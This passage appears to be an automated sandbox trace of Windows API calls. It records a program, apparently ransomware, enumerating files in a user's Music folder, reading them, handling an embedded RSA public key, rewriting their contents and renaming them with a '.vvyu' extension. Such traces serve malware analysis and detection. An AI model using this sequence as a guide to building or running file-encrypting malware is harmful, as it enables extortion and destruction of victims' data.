HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d1a8 | out: hHeap=0x6a0000) returned 1 [0197.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.192] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x146e0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x146e0, lpOverlapped=0x0) returned 1 [0197.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.193] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x146e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.193] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.195] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.195] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.195] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.196] CloseHandle (hObject=0x52c) returned 1 [0197.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0197.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0197.198] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\pE7_nJD0Tmm8m2VYvr.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\pe7_njd0tmm8m2vyvr.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\pE7_nJD0Tmm8m2VYvr.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\pe7_njd0tmm8m2vyvr.wav.vvyu")) returned 1 [0197.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.201] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.204] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72558800, ftCreationTime.dwHighDateTime=0x1d89ad1, ftLastAccessTime.dwLowDateTime=0x5b0414d0, ftLastAccessTime.dwHighDateTime=0x1d8a1e0, ftLastWriteTime.dwLowDateTime=0x5b0414d0, ftLastWriteTime.dwHighDateTime=0x1d8a1e0, nFileSizeHigh=0x0, nFileSizeLow=0x6ce6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WL5kmFtLwSv3.m4a", cAlternateFileName="WL5KMF~1.M4A")) returned 1 [0197.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.205] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\WL5kmFtLwSv3.m4a") returned=".m4a" [0197.205] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\WL5kmFtLwSv3.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\wl5kmftlwsv3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.206] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=27878) returned 1 [0197.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.208] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x6cc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.208] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.214] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.214] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6ce6, lpOverlapped=0x0) returned 1 [0197.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.216] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.218] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.218] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.218] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.218] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.218] GetLastError () returned 0x0 [0197.219] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.219] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.219] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.219] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.219] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6cf0) returned 0x2d4f778 [0197.220] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d1a8 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d1f0 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.222] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0197.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a3a8 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.227] GetCurrentThreadId () returned 0x264 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4ba60 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.228] GetCurrentThreadId () returned 0x264 [0197.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.230] RtlAllocateHeap 